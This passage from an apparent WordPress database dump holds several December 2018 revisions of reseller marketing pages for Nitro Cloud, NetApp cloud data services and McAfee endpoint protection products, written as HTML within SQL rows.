class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-17 09:22:21','2018-12-17 01:22:21','',1436,'https://bintara.com.my/blog/2018/12/17/1436-revision-v1/',0,'revision','',0),(2236,1,'2018-12-17 09:36:21','2018-12-17 01:36:21','<h3>Work from Anywhere with Nitro Cloud</h3>\r\nWhether you need to merge PDFs online or access your files on the go, Nitro Cloud equips you with the tools to accomplish your goals anytime, anywhere.\r\n\r\n<img class=\"alignnone wp-image-2232 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/pdf-workflows-300x194.png\" alt=\"\" width=\"300\" height=\"194\" />\r\n<h3>Complete your most common PDF workflows online</h3>\r\nIn just a couple clicks, Nitro Cloud can generate an easily accessible link so knowledge workers can securely share files with clients or colleaguesâ€”without the need for email attachments.\r\n\r\n<img class=\"alignnone wp-image-2233 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/convert-files-300x220.png\" alt=\"\" width=\"300\" height=\"220\" />\r\n<h3>Convert Office files to and from PDF online</h3>\r\nWith the online PDF converter in Nitro Cloud, you can quickly convert PDFs to and from Word files, Excel spreadsheets, and PowerPoint presentations to more easily work with the file formats you use most.\r\n\r\n<img class=\"alignnone wp-image-2234 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/connect-documents-300x164.png\" alt=\"\" width=\"300\" height=\"164\" />\r\n<h3>Connect to your documents in the cloud</h3>\r\nNo need to worry about not being able to access your files while away from your primary computer. Nitro Cloud allows you to access and store documents from any web browser or mobile device thanks to integrations with your favorite document repositories, including Dropbox, Google Drive, OneDrive, SharePoint, Office 365, and Box.\r\n\r\n<img class=\"alignnone wp-image-2235 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/maximize-time-253x300.png\" alt=\"\" width=\"253\" height=\"300\" />\r\n<h3>Maximize your time</h3>\r\nWith around-the-clock access to your important files and most common document workflows, you can optimize your time and productivity while on the goâ€”from combining and sharing files with a client at their office, to reviewing a document while on vacation, to converting a PDF to Word so you can download and edit the document on your home computer.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Nitro','','inherit','closed','closed','','1553-revision-v1','','','2018-12-17 09:36:21','2018-12-17 01:36:21','',1553,'https://bintara.com.my/blog/2018/12/17/1553-revision-v1/',0,'revision','',0),(2240,1,'2018-12-17 09:59:20','2018-12-17 01:59:20','<h3 class=\"n-hero__content-title\">Integrate Cloud Data Services</h3>\r\n<h4 class=\"n-hero__content-subtitle\">Accelerate your cloud workloads and simplify your data protection.</h4>\r\n&nbsp;\r\n<h4 class=\"n-band__heading\">Get real value from your cloud.</h4>\r\nThe cloud is the single biggest platform for digital transformation. The rapid adoption of fast-evolving technologies, methodologies, and tools is driving innovation across the enterprise.\r\n\r\nOnly NetApp is building a comprehensive set of cloud data services to transform your businessâ€”how, when and where you work.\r\n\r\n&nbsp;\r\n<h3 class=\"ntap-section__header-title ntap-h2-medium\">Your Comprehensive Cloud Data Services Solutions</h3>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud Analytics</h4>\r\n</header>Accelerate time to insight with the most capable storage services in the cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>High-performance computing</li>\r\n 	<li>Business intelligence</li>\r\n 	<li>Machine or deep learning</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">File Services</h4>\r\n</header>Deploy the highest-performing, most available, and feature-rich file services on your choice of cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Web content management</li>\r\n 	<li>Media and entertainment images</li>\r\n 	<li>Oil and gas repositories</li>\r\n 	<li>Enterprise applications</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Database</h4>\r\n</header>Deploy or move high-performance databases to the cloud with confidence.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>ERP systems</li>\r\n 	<li>Financial transactions and reporting</li>\r\n 	<li>Customer management</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">DevOps</h4>\r\n</header>Automate your Kubernetes and DevOps tools from storage to containers to clusters.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Agile software development</li>\r\n 	<li>CI/CD pipeline</li>\r\n 	<li>Artifact repositories</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud and SaaS Backup</h4>\r\n</header>Use the cloud to protect your on-premises or cloud-native data and SaaS applications.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Backup and archive data to the cloud</li>\r\n 	<li>Protect SaaS application data</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Disaster Recovery</h4>\r\n</header>Increase data availability and promote new value with a cloud-based disaster recovery solution.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Enterprise applications</li>\r\n 	<li>File shares</li>\r\n 	<li>Databases</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','NetApp','','inherit','closed','closed','','1552-revision-v1','','','2018-12-17 09:59:20','2018-12-17 01:59:20','',1552,'https://bintara.com.my/blog/2018/12/17/1552-revision-v1/',0,'revision','',0),(2238,1,'2018-12-17 09:58:00','2018-12-17 01:58:00','<h3 class=\"n-hero__content-title\">Integrate Cloud Data Services</h3>\r\n<h4 class=\"n-hero__content-subtitle\">Accelerate your cloud workloads and simplify your data protection.</h4>\r\n&nbsp;\r\n<h4 class=\"n-band__heading\">Get real value from your cloud.</h4>\r\nThe cloud is the single biggest platform for digital transformation. The rapid adoption of fast-evolving technologies, methodologies, and tools is driving innovation across the enterprise.\r\n\r\nOnly NetApp is building a comprehensive set of cloud data services to transform your businessâ€”how, when and where you work.\r\n\r\n&nbsp;\r\n<h3 class=\"ntap-section__header-title ntap-h2-medium\">Your Comprehensive Cloud Data Services Solutions</h3>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud Analytics</h4>\r\n</header>Accelerate time to insight with the most capable storage services in the cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>High-performance computing</li>\r\n 	<li>Business intelligence</li>\r\n 	<li>Machine or deep learning</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4></h4>\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">File Services</h4>\r\n</header>Deploy the highest-performing, most available, and feature-rich file services on your choice of cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Web content management</li>\r\n 	<li>Media and entertainment images</li>\r\n 	<li>Oil and gas repositories</li>\r\n 	<li>Enterprise applications</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Database</h4>\r\n</header>Deploy or move high-performance databases to the cloud with confidence.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>ERP systems</li>\r\n 	<li>Financial transactions and reporting</li>\r\n 	<li>Customer management</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">DevOps</h4>\r\n</header>Automate your Kubernetes and DevOps tools from storage to containers to clusters.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Agile software development</li>\r\n 	<li>CI/CD pipeline</li>\r\n 	<li>Artifact repositories</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud and SaaS Backup</h4>\r\n</header>Use the cloud to protect your on-premises or cloud-native data and SaaS applications.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Backup and archive data to the cloud</li>\r\n 	<li>Protect SaaS application data</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Disaster Recovery</h4>\r\n</header>Increase data availability and promote new value with a cloud-based disaster recovery solution.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Enterprise applications</li>\r\n 	<li>File shares</li>\r\n 	<li>Databases</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','NetApp','','inherit','closed','closed','','1552-revision-v1','','','2018-12-17 09:58:00','2018-12-17 01:58:00','',1552,'https://bintara.com.my/blog/2018/12/17/1552-revision-v1/',0,'revision','',0),(2239,1,'2018-12-17 09:58:55','2018-12-17 01:58:55','<h3 class=\"n-hero__content-title\">Integrate Cloud Data Services</h3>\r\n<h4 class=\"n-hero__content-subtitle\">Accelerate your cloud workloads and simplify your data protection.</h4>\r\n&nbsp;\r\n<h4 class=\"n-band__heading\">Get real value from your cloud.</h4>\r\nThe cloud is the single biggest platform for digital transformation. The rapid adoption of fast-evolving technologies, methodologies, and tools is driving innovation across the enterprise.\r\n\r\nOnly NetApp is building a comprehensive set of cloud data services to transform your businessâ€”how, when and where you work.\r\n\r\n&nbsp;\r\n<h3 class=\"ntap-section__header-title ntap-h2-medium\">Your Comprehensive Cloud Data Services Solutions</h3>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud Analytics</h4>\r\n</header>Accelerate time to insight with the most capable storage services in the cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>High-performance computing</li>\r\n 	<li>Business intelligence</li>\r\n 	<li>Machine or deep learning</li>\r\n</ul>\r\n&nbsp;\r\n\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">File Services</h4>\r\n</header>Deploy the highest-performing, most available, and feature-rich file services on your choice of cloud.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Web content management</li>\r\n 	<li>Media and entertainment images</li>\r\n 	<li>Oil and gas repositories</li>\r\n 	<li>Enterprise applications</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Database</h4>\r\n</header>Deploy or move high-performance databases to the cloud with confidence.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>ERP systems</li>\r\n 	<li>Financial transactions and reporting</li>\r\n 	<li>Customer management</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">DevOps</h4>\r\n</header>Automate your Kubernetes and DevOps tools from storage to containers to clusters.\r\n\r\n<strong>PRIMARY WORKLOADS:</strong>\r\n<ul>\r\n 	<li>Agile software development</li>\r\n 	<li>CI/CD pipeline</li>\r\n 	<li>Artifact repositories</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Cloud and SaaS Backup</h4>\r\n</header>Use the cloud to protect your on-premises or cloud-native data and SaaS applications.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Backup and archive data to the cloud</li>\r\n 	<li>Protect SaaS application data</li>\r\n</ul>\r\n<header class=\"ntap-card__header\">\r\n<h4 class=\"ntap-card__title ntap-h4-bold\">Disaster Recovery</h4>\r\n</header>Increase data availability and promote new value with a cloud-based disaster recovery solution.\r\n\r\n<strong>PRIMARY USE CASES:</strong>\r\n<ul>\r\n 	<li>Enterprise applications</li>\r\n 	<li>File shares</li>\r\n 	<li>Databases</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','NetApp','','inherit','closed','closed','','1552-revision-v1','','','2018-12-17 09:58:55','2018-12-17 01:58:55','',1552,'https://bintara.com.my/blog/2018/12/17/1552-revision-v1/',0,'revision','',0),(2242,1,'2018-12-17 10:09:28','2018-12-17 02:09:28','<h3 id=\"dynamicTitleID\">Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n<h4>McAfee MVISION Endpoint</h4>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n<h4>McAfee MVISION Mobile</h4>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n<h4>McAfee Endpoint Security</h4>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n<h4>McAfee MVISION EDR</h4>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n<h4>McAfee Embedded Control</h4>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:09:28','2018-12-17 02:09:28','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2243,1,'2018-12-17 10:10:24','2018-12-17 02:10:24','<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n<h4>McAfee MVISION Endpoint</h4>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n<h4>McAfee MVISION Mobile</h4>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n<h4>McAfee Endpoint Security</h4>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n<h4>McAfee MVISION EDR</h4>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n<h4>McAfee Embedded Control</h4>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:10:24','2018-12-17 02:10:24','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2244,1,'2018-12-17 10:11:09','2018-12-17 02:11:09','<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n\r\n&nbsp;\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<h4>McAfee MVISION Endpoint</h4>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<h4>McAfee MVISION Mobile</h4>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<h4>McAfee Endpoint Security</h4>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<h4>McAfee MVISION EDR</h4>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<h4>McAfee Embedded Control</h4>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:11:09','2018-12-17 02:11:09','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2245,1,'2018-12-17 10:15:10','2018-12-17 02:15:10','<h3>Enterprise security that works smarter, not harder.</h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n\r\n&nbsp;\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:15:10','2018-12-17 02:15:10','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2248,1,'2018-12-17 10:18:29','2018-12-17 02:18:29','<h3>Enterprise security that works smarter, not harder.</h3>\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n<h3></br></h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:18:29','2018-12-17 02:18:29','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2246,1,'2018-12-17 10:15:44','2018-12-17 02:15:44','<h3>Enterprise security that works smarter, not harder.</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n<h3></h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','inherit','closed','closed','','1549-revision-v1','','','2018-12-17 10:15:44','2018-12-17 02:15:44','',1549,'https://bintara.com.my/blog/2018/12/17/1549-revision-v1/',0,'revision','',0),(2247,1,'2018-12-17 10:16:36','2018-12-17 02:16:36','<h3>Enterprise security that works smarter, not harder.</h3>\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n<h3></h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of 